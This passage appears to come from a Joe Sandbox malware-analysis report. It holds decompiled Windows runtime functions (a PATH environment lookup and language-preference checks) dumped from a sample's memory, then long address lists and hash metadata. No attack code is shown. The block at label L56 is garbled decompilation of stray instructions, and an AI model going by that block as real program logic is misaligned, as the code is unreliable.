											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M01792959))) {
												case 0:
													__ax =  *0x1858488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E017AF3E0(__edi,  *0x185848c, __ax & 0x0000ffff);
														__eax =  *0x1858488 & 0x0000ffff;
														goto L26;
													}
													goto L126;
												case 1:
													L45:
													E017AF3E0(_t323, _v80, _v64);
													_t270 = _v64;
													goto L26;
												case 2:
													 *0x1858480 & 0x0000ffff = E017AF3E0(__edi,  *0x1858484,  *0x1858480 & 0x0000ffff);
													__eax =  *0x1858480 & 0x0000ffff;
													__eax = ( *0x1858480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E017AF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L126;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E017AF3E0(_t323, _v76, _v36);
														_t270 = _v36;
													}
													L26:
													_t339 = _t339 + 0xc;
													_t323 = _t323 + (_t270 >> 1) * 2 + 2;
													__eflags = _t323;
													L27:
													_push(0x3b);
													_pop(_t272);
													 *((short*)(_t323 - 2)) = _t272;
													goto L28;
												case 6:
													__ebx =  *0x185575c;
													__eflags = __ebx - 0x185575c;
													if(__ebx != 0x185575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E017AF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x185575c;
														} while (__ebx != 0x185575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1858478 & 0x0000ffff = E017AF3E0(__edi,  *0x185847c,  *0x1858478 & 0x0000ffff);
													__eax =  *0x1858478 & 0x0000ffff;
													__eax = ( *0x1858478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E017F39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1856e58 & 0x0000ffff = E017AF3E0(__edi,  *0x1856e5c,  *0x1856e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1856e58 & 0x0000ffff;
													__eax = ( *0x1856e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t294 = _v16;
													_t310 = _v32;
													L29:
													_t281 = _t281 + 4;
													__eflags = _t281;
													_v56 = _t281;
													goto L30;
											}
										}
									}
									goto L126;
									L30:
									_t294 = _t294 + 1;
									_v16 = _t294;
									__eflags = _t294 - _v48;
								} while (_t294 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t321 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M01792935))) {
							case 0:
								__ax =  *0x1858488;
								__eflags = __ax;
								if(__eflags != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t310 =  &_v64;
								_v80 = E01792E3E(0,  &_v64);
								_t281 = _t281 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1858480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1858480;
									goto L98;
								}
								goto L14;
							case 3:
								__eax = E0177EEF0(0x18579a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L75();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0177EB70(__ecx, 0x18579a0);
									__eflags = __esi - 0xc0000100;
									if(__eflags == 0) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t329;
												if(_t329 < 0) {
													L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t290 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1857b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01784620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0177EB70(__ecx, 0x18579a0);
										__eax = _v52;
										L36:
										_pop(_t322);
										_pop(_t330);
										__eflags = _v8 ^ _t335;
										_pop(_t282);
										return E017AB640(_t219, _t282, _v8 ^ _t335, _t310, _t322, _t330);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L75();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L126;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t277 = _v56;
								if(_v56 != 0) {
									_t310 =  &_v36;
									_t279 = E01792E3E(_t277,  &_v36);
									_t290 = _v36;
									_v76 = _t279;
								}
								if(_t290 == 0) {
									goto L44;
								} else {
									_t281 = _t281 + 2 + _t290;
								}
								goto L14;
							case 6:
								__eax =  *0x1855764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1858478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x1858478;
									L98:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1856e58 & 0x0000ffff;
								__eax = ( *0x1856e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t321 = _t321 + 1;
								if(_t321 >= _v48) {
									goto L16;
								} else {
									_t310 = _v37;
									goto L1;
								}
								goto L126;
						}
					}
					L56:
					_t295 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					if(__eflags < 0) {
						asm("o16 sub [ecx+0x1], bh");
					}
					_t105 = _t295 + 1;
					 *_t105 =  *(_t295 + 1) - _t281;
					__eflags =  *_t105;
					asm("loopne 0x29");
					if(__eflags < 0) {
						if (__eflags >= 0) goto L62;
					}
					if(__eflags < 0) {
						_t328 = _t328 + 1;
						__eflags = _t328;
					}
					 *(_t295 + 1) =  *(_t295 + 1) - _t281;
					_t245 = _t244 + 0x1f017926;
					__eflags = _t245;
					_pop(_t285);
					if(_t245 < 0) {
						_t245 = _t339;
					}
					 *(_t295 + 1) =  *(_t295 + 1) - _t285;
					_t246 = _t245 ^ 0x02017d5b;
					 *(_t295 + 1) =  *(_t295 + 1) - _t323;
					 *_t246 =  *_t246 - 0x79;
					_t331 = _t328 + _t328;
					__eflags = _t331;
					asm("daa");
					if(_t331 < 0) {
						_push(ds);
					}
					 *(_t295 + 1) =  *(_t295 + 1) - _t285;
					_t332 = _t331 - 1;
					_t116 = _t295 + 1;
					 *_t116 =  *(_t295 + 1) - _t285;
					__eflags =  *_t116;
					asm("daa");
					if(__eflags < 0) {
						asm("fcomp dword [ebx+0x7d]");
					}
					_pop(_t286);
					if(__eflags < 0) {
						_t246 = 0x28;
					}
					_t118 = _t295 + 1;
					 *_t118 =  *(_t295 + 1) - _t286;
					__eflags =  *_t118;
				}
				L126:
			}











































                                                                              0x01792584
                                                                              0x01792586
                                                                              0x01792590
                                                                              0x01792599
                                                                              0x0179259e
                                                                              0x017925a4
                                                                              0x017925a9
                                                                              0x017925ac
                                                                              0x017925ae
                                                                              0x017925b1
                                                                              0x017925b2
                                                                              0x017925b5
                                                                              0x017925b8
                                                                              0x017925bb
                                                                              0x017925bc
                                                                              0x017925bf
                                                                              0x017925c2
                                                                              0x017925c5
                                                                              0x017925c6
                                                                              0x017925cb
                                                                              0x017925ce
                                                                              0x017925d8
                                                                              0x017925db
                                                                              0x017925dd
                                                                              0x017925de
                                                                              0x017925e1
                                                                              0x017925e3
                                                                              0x017925e9
                                                                              0x017926da
                                                                              0x017926da
                                                                              0x017926dd
                                                                              0x017926e2
                                                                              0x017d5b56
                                                                              0x00000000
                                                                              0x017926e8
                                                                              0x017926f9
                                                                              0x017926fb
                                                                              0x017926fe
                                                                              0x01792700
                                                                              0x017d5b60
                                                                              0x00000000
                                                                              0x01792706
                                                                              0x01792706
                                                                              0x0179270a
                                                                              0x0179270a
                                                                              0x0179270d
                                                                              0x01792713
                                                                              0x01792716
                                                                              0x01792718
                                                                              0x0179271c
                                                                              0x0179271e
                                                                              0x017d5b6c
                                                                              0x017d5b6f
                                                                              0x017d5b7f
                                                                              0x017d5b89
                                                                              0x017d5b8e
                                                                              0x017d5b93
                                                                              0x017d5b96
                                                                              0x017d5b9c
                                                                              0x017d5ba0
                                                                              0x017d5ba3
                                                                              0x017d5bab
                                                                              0x017d5bb0
                                                                              0x017d5bb3
                                                                              0x017d5bb3
                                                                              0x017d5ba3
                                                                              0x01792724
                                                                              0x01792726
                                                                              0x01792729
                                                                              0x0179272c
                                                                              0x0179279d
                                                                              0x0179279d
                                                                              0x017927a0
                                                                              0x017927a2
                                                                              0x00000000
                                                                              0x0179272e
                                                                              0x0179272e
                                                                              0x01792731
                                                                              0x01792734
                                                                              0x01792734
                                                                              0x01792736
                                                                              0x017d5bc1
                                                                              0x017d5bc1
                                                                              0x017d5bc4
                                                                              0x00000000
                                                                              0x017d5bca
                                                                              0x017d5bca
                                                                              0x017d5bcd
                                                                              0x00000000
                                                                              0x017d5bd3
                                                                              0x00000000
                                                                              0x017d5bd3
                                                                              0x017d5bcd
                                                                              0x0179273c
                                                                              0x0179273c
                                                                              0x01792742
                                                                              0x01792747
                                                                              0x0179274a
                                                                              0x0179274d
                                                                              0x01792750
                                                                              0x00000000
                                                                              0x01792756
                                                                              0x01792756
                                                                              0x00000000
                                                                              0x01792902
                                                                              0x01792908
                                                                              0x0179290b
                                                                              0x00000000
                                                                              0x01792911
                                                                              0x0179291c
                                                                              0x01792921
                                                                              0x00000000
                                                                              0x01792921
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792880
                                                                              0x01792887
                                                                              0x0179288c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792805
                                                                              0x0179280a
                                                                              0x01792814
                                                                              0x01792816
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179281e
                                                                              0x01792821
                                                                              0x01792823
                                                                              0x00000000
                                                                              0x01792829
                                                                              0x01792829
                                                                              0x01792831
                                                                              0x0179283c
                                                                              0x0179283e
                                                                              0x00000000
                                                                              0x0179283e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179284e
                                                                              0x01792850
                                                                              0x01792851
                                                                              0x01792854
                                                                              0x01792857
                                                                              0x0179285a
                                                                              0x0179285c
                                                                              0x0179285d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0179275d
                                                                              0x01792761
                                                                              0x00000000
                                                                              0x01792767
                                                                              0x0179276e
                                                                              0x01792773
                                                                              0x01792773
                                                                              0x01792776
                                                                              0x01792778
                                                                              0x0179277e
                                                                              0x0179277e
                                                                              0x01792781
                                                                              0x01792781
                                                                              0x01792783
                                                                              0x01792784
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5bd8
                                                                              0x017d5bde
                                                                              0x017d5be4
                                                                              0x017d5be6
                                                                              0x017d5be8
                                                                              0x017d5be9
                                                                              0x017d5bee
                                                                              0x017d5bf8
                                                                              0x017d5bff
                                                                              0x017d5c01
                                                                              0x017d5c04
                                                                              0x017d5c07
                                                                              0x017d5c0b
                                                                              0x017d5c0d
                                                                              0x017d5c0d
                                                                              0x017d5c15
                                                                              0x017d5c18
                                                                              0x017d5c1b
                                                                              0x017d5c1b
                                                                              0x017d5c1e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017928c3
                                                                              0x017928c8
                                                                              0x017928d2
                                                                              0x017928d4
                                                                              0x017928d8
                                                                              0x017928db
                                                                              0x017d5c26
                                                                              0x017d5c28
                                                                              0x017d5c2d
                                                                              0x017d5c2d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5c34
                                                                              0x017d5c36
                                                                              0x017d5c49
                                                                              0x017d5c4e
                                                                              0x017d5c54
                                                                              0x017d5c5b
                                                                              0x017d5c5d
                                                                              0x017d5c60
                                                                              0x01792788
                                                                              0x01792788
                                                                              0x0179278b
                                                                              0x0179278e
                                                                              0x0179278e
                                                                              0x0179278e
                                                                              0x01792791
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792756
                                                                              0x01792750
                                                                              0x00000000
                                                                              0x01792794
                                                                              0x01792794
                                                                              0x01792795
                                                                              0x01792798
                                                                              0x01792798
                                                                              0x00000000
                                                                              0x01792734
                                                                              0x0179272c
                                                                              0x01792700
                                                                              0x017925ef
                                                                              0x017925ef
                                                                              0x017925ef
                                                                              0x017925f2
                                                                              0x017925f8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017925fe
                                                                              0x00000000
                                                                              0x017928e6
                                                                              0x017928ec
                                                                              0x017928ef
                                                                              0x017928f5
                                                                              0x017928f8
                                                                              0x017928f8
                                                                              0x00000000
                                                                              0x017928f8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792866
                                                                              0x01792866
                                                                              0x01792876
                                                                              0x01792879
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017927e0
                                                                              0x017927e7
                                                                              0x017927e9
                                                                              0x017927eb
                                                                              0x017d5afd
                                                                              0x00000000
                                                                              0x017d5afd
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792633
                                                                              0x01792638
                                                                              0x0179263b
                                                                              0x0179263c
                                                                              0x0179263e
                                                                              0x01792640
                                                                              0x01792642
                                                                              0x01792647
                                                                              0x01792649
                                                                              0x0179264e
                                                                              0x01792650
                                                                              0x01792653
                                                                              0x01792659
                                                                              0x017926a2
                                                                              0x017926a7
                                                                              0x017926ac
                                                                              0x017926b2
                                                                              0x017d5b11
                                                                              0x017d5b15
                                                                              0x017d5b17
                                                                              0x00000000
                                                                              0x017926b8
                                                                              0x017926b8
                                                                              0x017926ba
                                                                              0x017927a6
                                                                              0x017927a6
                                                                              0x017927a9
                                                                              0x017927ab
                                                                              0x017927b9
                                                                              0x017927b9
                                                                              0x017927be
                                                                              0x017927c1
                                                                              0x017927c3
                                                                              0x017927c5
                                                                              0x017927c7
                                                                              0x017d5c74
                                                                              0x017d5c79
                                                                              0x017d5c79
                                                                              0x017927c7
                                                                              0x00000000
                                                                              0x017926c0
                                                                              0x017926c0
                                                                              0x017926c3
                                                                              0x017926c6
                                                                              0x017926c6
                                                                              0x017926c9
                                                                              0x017926c9
                                                                              0x00000000
                                                                              0x017926c9
                                                                              0x017926ba
                                                                              0x0179265b
                                                                              0x0179265b
                                                                              0x0179265e
                                                                              0x01792667
                                                                              0x0179266d
                                                                              0x01792677
                                                                              0x0179267c
                                                                              0x0179267f
                                                                              0x01792681
                                                                              0x017d5b49
                                                                              0x017d5b4e
                                                                              0x017927cd
                                                                              0x017927d0
                                                                              0x017927d1
                                                                              0x017927d2
                                                                              0x017927d4
                                                                              0x017927dd
                                                                              0x01792687
                                                                              0x01792687
                                                                              0x0179268a
                                                                              0x0179268b
                                                                              0x0179268e
                                                                              0x0179268f
                                                                              0x01792691
                                                                              0x01792696
                                                                              0x01792698
                                                                              0x0179269d
                                                                              0x0179269f
                                                                              0x00000000
                                                                              0x0179269f
                                                                              0x01792681
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792846
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792605
                                                                              0x0179260a
                                                                              0x0179260c
                                                                              0x01792611
                                                                              0x01792616
                                                                              0x01792619
                                                                              0x01792619
                                                                              0x0179261e
                                                                              0x00000000
                                                                              0x01792624
                                                                              0x01792627
                                                                              0x01792627
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5b1f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01792894
                                                                              0x0179289b
                                                                              0x0179289d
                                                                              0x017928a1
                                                                              0x017d5b2b
                                                                              0x017d5b2e
                                                                              0x017d5b2e
                                                                              0x017928a7
                                                                              0x017928a9
                                                                              0x017d5b04
                                                                              0x017d5b09
                                                                              0x017d5b09
                                                                              0x017d5b09
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017d5b35
                                                                              0x017d5b3c
                                                                              0x017928fb
                                                                              0x017928fb
                                                                              0x017926cc
                                                                              0x017926cc
                                                                              0x017926d0
                                                                              0x00000000
                                                                              0x017926d2
                                                                              0x017926d2
                                                                              0x00000000
                                                                              0x017926d2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017925fe
                                                                              0x0179292d
                                                                              0x0179292f
                                                                              0x01792930
                                                                              0x01792935
                                                                              0x01792937
                                                                              0x01792939
                                                                              0x01792939
                                                                              0x0179293a
                                                                              0x0179293a
                                                                              0x0179293a
                                                                              0x0179293d
                                                                              0x0179293f
                                                                              0x01792941
                                                                              0x01792941
                                                                              0x01792942
                                                                              0x01792945
                                                                              0x01792945
                                                                              0x01792945
                                                                              0x01792946
                                                                              0x01792949
                                                                              0x01792949
                                                                              0x0179294e
                                                                              0x0179294f
                                                                              0x01792951
                                                                              0x01792951
                                                                              0x01792952
                                                                              0x01792955
                                                                              0x0179295a
                                                                              0x0179295d
                                                                              0x01792960
                                                                              0x01792960
                                                                              0x01792962
                                                                              0x01792963
                                                                              0x01792965
                                                                              0x01792965
                                                                              0x01792966
                                                                              0x01792969
                                                                              0x0179296a
                                                                              0x0179296a
                                                                              0x0179296a
                                                                              0x0179296e
                                                                              0x0179296f
                                                                              0x01792971
                                                                              0x01792971
                                                                              0x01792972
                                                                              0x01792973
                                                                              0x01792975
                                                                              0x01792975
                                                                              0x01792976
                                                                              0x01792976
                                                                              0x01792976
                                                                              0x01792976
                                                                              0x00000000

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: PATH
                                                                              • API String ID: 0-1036084923
                                                                              • Opcode ID: bf6bfb03756766704a1fff68adb1f891725695621b778812e3aa183da9121778
                                                                              • Instruction ID: 2723e81a9ba3e0add08891d57a1c77011f7e327d180fee16603bcc782c88a3d8
                                                                              • Opcode Fuzzy Hash: bf6bfb03756766704a1fff68adb1f891725695621b778812e3aa183da9121778
                                                                              • Instruction Fuzzy Hash: DCC19F71D00219EBDF24EF99E880BADFBB5FF48710F544069EA01BB255D734A945CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0179FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 80%
                                                                              			E0179FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0177EEF0(0x1857b60);
					_t134 =  *0x1857b84; // 0x771a7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1857b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1857b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01776D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E017776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01808938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0176B150();
													}
													_t116 = E01806D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E017775CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1858638; // 0x0
																	_t122 = L017738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E017776E2(_t154);
																			goto L41;
																		}
																	} else {
																		E017776E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0179FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0179FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0179FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0179FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0179FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0179FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1857b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1857b84 = _t75;
						_t73 = E0177EB70(_t134, 0x1857b60);
						if( *0x1857b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0177FF60( *0x1857b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                              0x0179fab0
                                                                              0x0179fab2
                                                                              0x0179fab3
                                                                              0x0179fab4
                                                                              0x0179fabc
                                                                              0x0179fac0
                                                                              0x0179fb14
                                                                              0x0179fb17
